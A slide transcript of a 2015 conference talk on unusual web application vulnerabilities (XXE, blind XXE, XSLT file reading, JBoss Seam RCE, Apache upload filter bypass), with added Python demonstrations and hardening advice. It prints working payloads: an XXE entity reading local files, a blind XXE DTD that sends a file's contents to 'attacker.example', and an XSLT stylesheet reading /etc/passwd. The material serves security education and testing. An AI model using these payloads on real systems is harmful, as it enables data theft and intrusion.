CONFidence 2015: Unusual security problems in web applications (Nietypowe problemy bezpieczeństwa w aplikacjach webowych) - Michał Sajdak
Transcript of the CONFidence 2015 talk by Michał Sajdak.
Unusual security problems in web applications.
Michał Sajdak, CISSP, CEH, F2B
securitum.pl
sekurak.pl
rozwal.to
About me
Michał Sajdak <at> securitum.pl
Pentester
Instructor (security trainings)
sekurak.pl founder
rozwal.to founder
2 Copyright 2014 Securitum
www.securitum.pl
Agenda
Vulnerabilities in Nuxeo (first public disclosure)
(Maybe?) not so obvious path traversal(s)
OS code exec
XXE
JBoss Seam: a nice RCE
RCE through XSLT transformation (if we have time)
PHP shell upload – filter bypassing (if we have time)
Educational use only
Nuxeo
Content Management Platform for the Software-Defined Enterprise
Nuxeo
The RPM (Release and Preservation Management) Department at EA uses the Nuxeo Platform to manage video game builds at all stages of the development lifecycle
Using the Nuxeo Platform as a core server, Jeppesen, a Boeing company, syncs flight bag information to iPads for pilots across the world.
Nuxeo
The Nuxeo Platform, offering strong support for SSO, along with a flexible content management platform, is the perfect addition to the US Navy’s application portfolio.
Orange manages communication with its mobile telecommunications and broadband internet provider clients through a secure extranet portal built on the Nuxeo Platform.
Nuxeo
History
Bugs patched this year (February 2015)
Reported by Michal Bentkowski & Sebastian Gilon from securitum.pl
https://doc.nuxeo.com/display/ADMINDOC/Nuxeo+Security+Update+-+2015-02-27+-+Critical
No details disclosed
DEMO
Nuxeo – reporting history
Securitum: Hey, you've got some nasty bugs in your platform. Here are the details.
Nuxeo: Cool, these are definitely nice bugs! We'll prepare a patch soon! BTW: do you want something for reporting the bug?
Securitum: No :-)
Nuxeo: Do you drink from time to time?
Securitum: Sometimes :P
Nuxeo: Cool, we are sending 2 crates of wine to Poland
Nice bug bounty
XXE (XML eXternal Entities)
XXE has been known for a while
But many, many applications are vulnerable by default
BTW: XXE tests are available only in the latest versions of Burp Suite (a very popular web pentesting tool)
XXE (XML eXternal Entities)
HTML entities: &lt; or <
&quot; &apos; &amp; &micro; … or:
&entity_name; &#entity_number;
HTML entities
Similar in XML…
12 Copyright 2014 Securitum
www.securitum.pl
XXE (XML eXternal Entities)
… but we can define our own entities
<!ENTITY name "value">
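An added example (not from the talk and not Nuxeo code) of what such a self-declared entity does to an ordinary parser: Python's xml.sax is used as the stand-in for the server-side parser, once with external general entities enabled (the permissive setting many parsers ship with) and once hardened. The <order><item> document, the secret file and all helper names are constructed for this example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Concatenates all character data, which is what an application that
    echoes <item> back to the user effectively returns to the attacker."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def xxe_document(target_path):
    """Attacker-supplied XML: the DOCTYPE declares &xxe; as an external
    entity whose SYSTEM identifier is a local file (file:///etc/passwd in
    a real attack); the entity is then referenced inside <item>."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE order [\n"
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        "]>\n"
        "<order><item>&xxe;</item></order>"
    )


def parse_item(xml_text, resolve_external_entities):
    """Parse the way a server-side component would.  True mirrors a parser
    left with external general entities enabled; False is the hardened
    setting (the Python default since 3.7.1)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.text()


def demo():
    """Plant a constructed secret, then feed the same document to a
    vulnerable and a hardened parser and return what each leaks."""
    workdir = tempfile.mkdtemp()
    secret_path = os.path.join(workdir, "secret.txt")
    with open(secret_path, "w", encoding="utf-8") as f:
        f.write("root:x:0:0:root:/root:/bin/bash")  # constructed /etc/passwd line
    doc = xxe_document(secret_path)
    return {
        "vulnerable": parse_item(doc, resolve_external_entities=True),
        "hardened": parse_item(doc, resolve_external_entities=False),
    }


if __name__ == "__main__":
    for config, leaked in demo().items():
        print(f"{config}: {leaked!r}")
```

The parser fetches whatever the SYSTEM identifier names, so replacing the file:// URL with http://127.0.0.1:8080/... turns the same declaration into the internal request described in the next slides; the hardened configuration simply never dereferences the identifier.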
XXE (XML eXternal Entities)
We can only read files?
No :P
Making HTTP requests
Transferring files to your server (blind XXE)
Making requests to 127.0.0.1
Some of these are unauthenticated?
Scanning backend infrastructure
Services with no auth check, etc., e.g.:
http://10.0.0.75:8080/usrMgmt/add/admin2/admin2
XXE (XML eXternal Entities)
Actually we can often exploit XXE even when no tag content is displayed (!)
i.e. it is enough that the XML parser runs (blind XXE)
Parameter entities
They can be used only inside the DOCTYPE (the DTD)
<!ENTITY % name "entity_value">
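An added example of the parameter-entity (blind) variant, not from the talk: the application never displays anything from the document, yet the DOCTYPE alone makes the parser fetch an attacker-hosted DTD, and that DTD makes it request a URL carrying the contents of a local file. It is written directly against Python's expat binding so that a dict can stand in for the attacker's web server and the target's file system, and so that every identifier the parser asks for is recorded. attacker.example, evil.dtd, /opt/app/secret.txt and the secret value are constructed; real attacks use an outbound HTTP request where the dict lookup is.

```python
import xml.parsers.expat as expat

SECRET = "API-KEY-4f3a9c"  # constructed; a single token, so expat's DTD tokenizer accepts it

# Attacker-hosted DTD (constructed).  %file; points at the target file, %eval;
# declares a second external parameter entity whose URL embeds the file's
# contents, and %exfil; makes the parser request that URL.
EVIL_DTD = (
    '<!ENTITY % file SYSTEM "file:///opt/app/secret.txt">\n'
    '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
    "'http://attacker.example/collect?d=%file;'>\">\n"
    "%eval;\n"
    "%exfil;\n"
)

# What the victim application receives: the DOCTYPE does all the work and no
# entity appears in element content, so nothing attacker-controlled is shown.
BLIND_XXE_DOC = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE order [\n"
    '  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">\n'
    "  %ext;\n"
    "]>\n"
    "<order><item>nothing to see here</item></order>"
)

# Stand-in for the network and file system the parser would reach out to.
FAKE_RESOURCES = {
    "http://attacker.example/evil.dtd": EVIL_DTD.encode("utf-8"),
    "file:///opt/app/secret.txt": SECRET.encode("utf-8"),
}


def parse_with_parameter_entities(doc, resources):
    """Parse doc with expat set to process parameter entities (the permissive
    setting).  Every SYSTEM identifier the parser asks for is recorded and
    served from `resources`; the list of requested identifiers is returned."""
    requested = []
    parsers = []  # stack: a sub-parser must be spawned from the parser currently running

    def external_entity_ref(context, base, system_id, public_id):
        requested.append(system_id)
        # The attacker's collector URL is not in `resources`: it gets a dummy
        # reply, but the secret has already travelled in the request line.
        data = resources.get(system_id, b"<!-- collected -->")
        sub = parsers[-1].ExternalEntityParserCreate(context)
        parsers.append(sub)
        try:
            sub.Parse(data, True)  # final=True, so entity values are committed
        finally:
            parsers.pop()
        return 1

    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    parser.ExternalEntityRefHandler = external_entity_ref
    parsers.append(parser)
    parser.Parse(doc.encode("utf-8"), True)
    return requested


def demo():
    """Returns the identifiers the parser fetched; the last one carries the secret."""
    return parse_with_parameter_entities(BLIND_XXE_DOC, FAKE_RESOURCES)


if __name__ == "__main__":
    for url in demo():
        print("parser requested:", url)
```

Two things carry over to real targets: the two requests to attacker.example have to be allowed out of the server's network, and file contents with characters that are illegal in a URL or in DTD markup (newlines, slashes, quotes) break this particular trick, which is why practical payloads wrap the file or encode it first.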
sekurak.pl/data/ccc
More info: sekurak.pl/tag/xxe/
XXE (XML eXternal Entities)
Can we only read files?
No :P
Making HTTP requests
Transferring files to your server (blind XXE)
The firewall must allow outgoing HTTP communication
Making requests to 127.0.0.1
Some of these are unauthenticated?
Scanning backend infrastructure
Services with no auth check, etc.
XXE (XML eXternal Entities)
DEMO
XSLT
XSLT (Extensible Stylesheet Language Transformations) is a language for:
transforming XML documents into other XML documents or other formats such as HTML for web pages, plain text
© wikipedia
XSLT
Commonly used for custom styling in web apps
XML (db generated) + XSLT (user provided styles)
= nice HTML
= nice PDF
etc.
XSLT
We can have a problem when a user (i.e. an attacker) can provide the XSL file that is parsed on the server side
Example: custom desktop in a web app
Example: print templates
…
XSLT
Java…
XSLT
PHP
Doesn't work by default… (XSLTProcessor exposes PHP functions to a stylesheet only after registerPHPFunctions() has been called)
But reading files does:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>
(document() loads the target with an XML parser, so only well-formed XML files come back intact; for other files the parser error itself often confirms that the path exists)
OS Command Exec – JBoss Seam
This one is an example of the following general problem:
We deploy an app which uses library X
After some time… vulnerabilities are found in that library
Info: Meder Kydyraliev, Seam Vulnerability, http://blog.o0o.nu/
OS Command Exec – JBoss Seam
There are vulnerabilities in JBoss Seam which allow you to execute OS commands
No auth needed
No specific conditions needed
The only requirement: the app uses a vulnerable version of the library
DEMO
Upload / Apache – filter bypassing
Commonly used methods:
File extension blacklisting
i.e.: no .php / .jsp / etc. can be uploaded
Checking file structure
i.e.: whether the uploaded file is a real image / PDF / etc.
Upload / Apache – filter bypassing
Interesting fact
How many Apache servers will interpret the following file:
test.jpg.php.wnk2j3.tralalala.sekurak
as txt?
as php?
as jpg?
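The answer depends on how PHP is wired into Apache: with the classic AddHandler/AddType configuration, mod_mime treats every dot-separated part of the name as an extension and applies each one it recognises, so the .php in the middle is honoured and the file runs as PHP even though its last extension is harmless. The added example below (not from the talk) models that lookup in Python next to the last-extension blacklist from the previous slide and a hardened server-side naming rule; the type/handler tables, the blacklist and the function names are constructed for the example.

```python
import secrets
from dataclasses import dataclass
from typing import Optional

# Constructed stand-in for a classic Apache configuration:
#   AddType image/jpeg .jpg / AddType text/plain .txt / ...
#   AddHandler application/x-httpd-php .php
TYPES = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png",
         "txt": "text/plain", "html": "text/html", "pdf": "application/pdf"}
HANDLERS = {"php": "application/x-httpd-php"}

# Extensions a typical upload blacklist tries to keep out (constructed list).
BLACKLIST = {"php", "phtml", "php3", "php4", "php5", "phar", "jsp", "asp", "aspx"}


@dataclass
class Resolution:
    content_type: Optional[str]
    handler: Optional[str]


def mod_mime_resolve(filename, types=TYPES, handlers=HANDLERS):
    """Model of mod_mime's multiple-extension rule (an assumption of this
    example, following the documented behaviour): every dot-separated part
    after the base name is an extension, each recognised one sets the
    metadata of its kind (the rightmost wins), unrecognised ones are ignored."""
    content_type = handler = None
    for ext in filename.split(".")[1:]:
        ext = ext.lower()
        if ext in types:
            content_type = types[ext]
        if ext in handlers:
            handler = handlers[ext]
    return Resolution(content_type, handler)


def blacklist_allows(filename):
    """The filter from the slide: look only at the last extension."""
    return filename.rsplit(".", 1)[-1].lower() not in BLACKLIST


def server_side_name(filename, allowed=frozenset({"jpg", "jpeg", "png", "pdf"})):
    """Hardened alternative: require exactly one allow-listed extension,
    throw the user-supplied base name away and generate our own."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0] or parts[1] not in allowed:
        return None
    return f"{secrets.token_hex(16)}.{parts[1]}"


def classify(filename):
    """Compare what the upload filter thinks with what Apache would do."""
    return {
        "passes_blacklist": blacklist_allows(filename),
        "apache_handler": mod_mime_resolve(filename).handler,
        "stored_as": server_side_name(filename),
    }


if __name__ == "__main__":
    for name in ("test.jpg.php.wnk2j3.tralalala.sekurak", "shell.php", "photo.jpg"):
        print(name, classify(name))
```

The trick only works where PHP is attached through mod_mime directives; a SetHandler inside a FilesMatch whose pattern is anchored with $ (the Debian-style PHP module configuration) looks at the end of the name only, which is also why the server-side rename above is the more portable defence than any blacklist.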
What’s next?
DotNetNuke – full unauthenticated admin
TP-Link devices
Two new methods for gaining OS root
One sort of universal – works on old and new devices
Disclosure on sekurak.pl ~soon
Q&A ?
Questions?
Contact: [email protected]
http://securitum.pl/
http://sekurak.pl/
http://rozwal.to/